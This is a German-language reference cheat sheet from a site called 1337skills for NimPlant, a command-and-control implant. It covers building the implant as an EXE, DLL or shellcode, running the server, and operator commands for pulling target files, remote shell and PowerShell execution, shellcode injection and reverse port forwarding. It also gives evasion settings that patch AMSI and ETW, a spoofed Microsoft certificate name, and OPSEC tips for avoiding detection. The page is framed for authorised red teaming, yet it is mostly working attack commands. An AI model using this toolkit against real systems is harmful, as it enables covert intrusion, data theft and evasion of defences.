Zum Inhalt springen
1337skills 1337skills - Referenzen

NimPlant

NimPlant ist ein leichtgewichtiges, plattformübergreifendes Command-and-Control (C2)-Implantat, geschrieben in Nim. Es bietet HTTP/HTTPS-Kommunikation, konfigurierbare Sleep-Intervalle, Dateioperationen und Shellcode-Ausführungsfähigkeiten.

HAFTUNGSAUSSCHLUSS: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Red-Team-Einsätze bestimmt. Die nicht autorisierte Nutzung gegen Systeme, die Sie nicht besitzen oder für deren Tests Sie keine ausdrückliche Genehmigung haben, ist illegal und unethisch. Holen Sie immer eine schriftliche Genehmigung ein, bevor Sie offensive Sicherheitsoperationen durchführen.

Installation

Server Setup

# Clone the repository
git clone https://github.com/chvancooten/NimPlant.git
cd NimPlant

# Install Python dependencies for the server
pip install -r server/requirements.txt

# Install Nim (required for compiling implants)
# On Linux
curl https://nim-lang.org/choosenim/init.sh -sSf | sh

# Install Nim dependencies
nimble install -y winim nimcrypto zippy

Compile the Implant

# Edit configuration before compiling
nano config.toml
# config.toml - NimPlant configuration
[server]
ip = "0.0.0.0"
port = 443
registerPath = "/api/register"
taskPath = "/api/task"
resultPath = "/api/result"

[implant]
sleepTime = 10
sleepJitter = 20
killDate = "2026-12-31"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Compile the implant (Windows EXE)
python3 NimPlant.py compile -o exe

# Compile as DLL
python3 NimPlant.py compile -o dll

# Compile as shellcode (via sRDI)
python3 NimPlant.py compile -o shellcode

# Cross-compile for Windows from Linux
python3 NimPlant.py compile -o exe --crosscompile

Server-Operationen

Starting the Server

# Start the NimPlant C2 server
python3 NimPlant.py server

# Server starts listening on configured port
# Web UI available at https://server-ip:port/

Managing Implants

# In the NimPlant server console:

# List active implants
nimplant> list

# Interact with a specific implant
nimplant> interact <implant-id>

# View implant details
nimplant> info

# Kill an implant
nimplant> kill

Befehle

Reconnaissance

# Get system information
nimplant> whoami
nimplant> hostname
nimplant> ipconfig
nimplant> env

# List running processes
nimplant> ps

# Get current working directory
nimplant> pwd

# List directory contents
nimplant> ls C:\Users

File Operations

# Upload a file to the target
nimplant> upload /local/path/file.exe C:\Windows\Temp\file.exe

# Download a file from the target
nimplant> download C:\Users\target\Documents\secrets.txt

# Read a file
nimplant> cat C:\Users\target\Desktop\notes.txt

# Create a directory
nimplant> mkdir C:\Windows\Temp\workdir

# Remove a file
nimplant> rm C:\Windows\Temp\file.exe

# Copy a file
nimplant> cp C:\source\file.txt C:\dest\file.txt

# Move a file
nimplant> mv C:\old\file.txt C:\new\file.txt

Execution

# Execute a shell command
nimplant> shell net user

# Execute a command via cmd.exe
nimplant> cmd /c dir C:\

# Run PowerShell command
nimplant> powershell Get-Process

# Execute assembly in memory (inline-execute)
nimplant> inline-execute /path/to/assembly.exe arg1 arg2

# Execute shellcode
nimplant> shinject <pid> /path/to/shellcode.bin

Network Operations

# List network connections
nimplant> netstat

# Reverse port forward
nimplant> rportfwd 8080 127.0.0.1 80

# Stop reverse port forward
nimplant> rportfwd stop 8080

Sleep and Communication

# Change sleep interval (seconds)
nimplant> sleep 30

# Change sleep jitter (percentage)
nimplant> jitter 40

# Combination: sleep 30 seconds with 40% jitter
nimplant> sleep 30
nimplant> jitter 40

HTTPS-Kommunikation

# Generate self-signed certificate for HTTPS
openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt \
  -days 365 -nodes -subj "/CN=cdn.microsoft.com"

# Place certificates in the server directory
cp server.key server/
cp server.crt server/

OPSEC-Überlegungen

# NimPlant OPSEC features:
# - Encrypted C2 communications (AES-256)
# - Configurable sleep with jitter to avoid beacon detection
# - Kill date to auto-terminate after engagement
# - User-agent customization to blend with normal traffic
# - Direct syscalls to avoid API hooking (optional)

# Recommended practices:
# 1. Use legitimate-looking domain with valid HTTPS certificate
# 2. Set appropriate sleep times (30-60s for stealth)
# 3. Use redirectors between implant and C2 server
# 4. Set a kill date matching the engagement window
# 5. Rotate implant binaries to avoid signature detection

Evasion-Konfiguration

# Additional config.toml evasion options
[implant]
sleepTime = 60
sleepJitter = 30
killDate = "2026-06-30"
userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

[evasion]
patchAmsi = true
patchEtw = true
unhookNtdll = true

Protokollierung

# Server logs all interactions
# Logs stored in: server/logs/

# View engagement log
cat server/logs/nimplant.log

# Each implant session has its own log
ls server/logs/sessions/

Bereinigung

# Terminate all active implants
nimplant> killall

# Individual implant cleanup
nimplant> interact <id>
nimplant> kill

# Remove artifacts from target (via shell before killing)
nimplant> shell del C:\path\to\implant.exe
nimplant> kill